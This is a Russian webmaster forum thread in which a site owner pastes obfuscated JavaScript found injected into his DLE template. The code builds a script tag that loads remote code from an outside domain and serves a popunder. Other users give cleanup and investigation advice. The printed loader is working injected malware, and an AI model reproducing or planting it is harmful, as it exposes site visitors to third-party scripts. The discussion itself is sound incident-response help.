- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Как снизить ДРР до 4,38% и повысить продажи с помощью VK Рекламы
Для интернет-магазина инженерных систем
Мария Лосева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Сегодня заметил на своем ДЛЕшном сайте попандер, который, естественно, я не устанавливал.
Нашел вот такой код в main.tpl
<!--
function zX750(qn584){document.write( String.fromCharCode(parseInt(qn584)-1));}
var QF351="105m117m117m113m59m48m48m83m106m76m112m51m"+
"53m47m112m108m112m116m105m102m100m105m108m98m47m111m"+
"102m117m48m116m48m113m106m90m113m68m55m50m51m55m48m"+
"64m116m106m101m62m56m57m51m55m55";var NA61=QF351.split("m");
document.write("<s"+"cript type='text/javascript' language='javascri"+"pt' src='");
for(S494=0;S494<NA61.length;S494++){zX750(NA61[S494]);}
document.write("'></sc"+"ript>");
// -->
Убрал код, проверил на вирусы. Все чисто.
Но - в папке templates все tpl файлы были изменены.
Изменений внешнего вида, вывода новостей и т.д. я не заметил.
Как по вашему был осуществлен взлом? Где слабое место? На что еще следует обратить внимание?
Заранее спасибо!
ДЛЕ то хоть лицензия? обновления ставили?
Нет - двиг нуленый, заплатку на 8.2 от известной проблемы ставил
Вася, это вирус!!! Удаляйте скорее свой сайт пока весь интернет не позаразили!!!11один
Смените пароль от ftp, админ-панели. Не сохраняйте пароли в различных ftp-менеджерах.
Вася, это вирус!!! Удаляйте скорее свой сайт пока весь интернет не позаразили!!!11один
Проверили все - вируса нет! Пароли изменили. Что еще необходимо сделать?
определить способ первоначального взлома
- логи (ФТП, найти ИП, который вызывает подозрение)
- саппорт хостинга (если логов сами найти не можете)
ээ, если с заходами на ФТП всё айс, проблема скорее-всего в конкретной версии движка
спасибо большое всем за советы!